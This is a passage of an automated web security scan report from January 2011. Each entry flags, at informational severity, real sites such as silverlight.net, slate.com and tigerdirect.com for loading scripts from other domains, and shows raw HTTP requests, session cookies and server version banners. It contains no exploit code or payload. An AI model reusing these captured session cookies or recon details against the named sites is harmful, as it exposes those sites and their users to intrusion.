<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.637. http://www.silverlight.net/learn/videos/silverlight-videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/silverlight-videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/silverlight-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 225515
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:34:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.638. http://www.silverlight.net/learn/videos/spanish-videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /learn/videos/spanish-videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learn/videos/spanish-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52595
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.639. http://www.silverlight.net/privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /privacy.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19103
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Privacy St
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.640. http://www.silverlight.net/showcase/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /showcase/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /showcase/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 12551
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Show
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://i1.asp.net/script/core/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.641. http://www.silverlight.net/termsofuse.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /termsofuse.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /termsofuse.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49831
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Terms Of U
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.642. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.six-telekurs.com
Path:   /tkfich_index/tkfich_home.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/html
Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT
ETag: "74935320-01010000"
Expires: Sun, 30 Jan 2011 01:03:20 GMT
Cache-Control: no-cache
Content-Length: 26752
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.six
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.643. http://www.slate.com/id/2282444/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /id/2282444/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/2282444/ HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:55:28 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&amp;v=1" xmlns=""></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

23.644. http://www.space.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.space.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.space.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 10:18:40 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<link rel="shortcut icon" href="/images/site/favicon.ico" />
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_YG0V27p3UjOJ3F3KX3aeQMPLvfh2QQxpVD66LktOyTJgGqERj4StoNkEIpmve2X3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>
<script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/space&sub_id=default'></script>
...[SNIP]...

23.645. http://www.spacedaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacedaily.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:40 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html
Content-Length: 78931

<HTML><HEAD><TITLE>Space News From SpaceDaily.Com</TITLE>
<META NAME="description" CONTENT="Space News from SpaceDaily.Com brings the space industry professional daily news from the frontier, with con
...[SNIP]...
</script>
       <script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...

23.646. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 7]><![endif]-->
<!--[if lt IE 7]><![endif]-->
<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

23.647. http://www.thespacereview.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thespacereview.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: text/html
Content-Length: 24875

<html>
<head>
<title>The Space Review: essays and commentary about the final frontier</title>
<link rel="stylesheet" type="text/css" href="/includes/style.css">
</head>

<body bgcolor="#ffffff" topmar
...[SNIP]...
<!-- ValueClick Media 120x600 and 160x600 SkyScraper CODE for The Space Review --><script language="javascript" src="http://media.fastclick.net/w/get.media?sid=58935&m=3&tp=7&d=j&t=n"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=d0yKxSl" charset="utf-8"></script>
...[SNIP]...

23.648. http://www.theworkbuzz.com/employment-trends/video-interviews/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /employment-trends/video-interviews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:31 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6605>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:18:52 GMT
Set-Cookie: X-Mapping-caklakng=EC453BC60E321747B8F3814F4BC289A4; path=/
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...

23.649. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /fun-stuff/your-work-soundtrack/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:41 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6495>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:19:04 GMT
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Content-Length: 57465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...

23.650. http://www.ticketcity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketcity.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ticketcity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:47 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Content-Length: 68525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-
...[SNIP]...
</script> <script type="text/javascript" src="https://secure.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</style> <script type='text/javascript' src='https://server1gateway.clickandchat.com/include.js?domain=www.ticketcity.com'></script>
...[SNIP]...

23.651. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</Script>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.652. http://www.transterrestrial.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.transterrestrial.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.transterrestrial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.transterrestrial.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 75605

<!-- BEGIN INDEX.PHP -->
<!--BEGIN HEADER.PHP-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<center><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

   </script>
...[SNIP]...
</script>

   <script type="text/javascript" language="JavaScript1.2"
   src="http://s19.sitemeter.com/js/counter.js?site=s19transterrestrial">


   </script>
...[SNIP]...

23.653. http://www.unica.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unica.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/
Set-Cookie: RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/
Date: Sun, 30 Jan 2011 02:03:21 GMT
Expires: Sun, 30 Jan 2011 02:03:21 GMT
lsrequestid: 44298918
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8

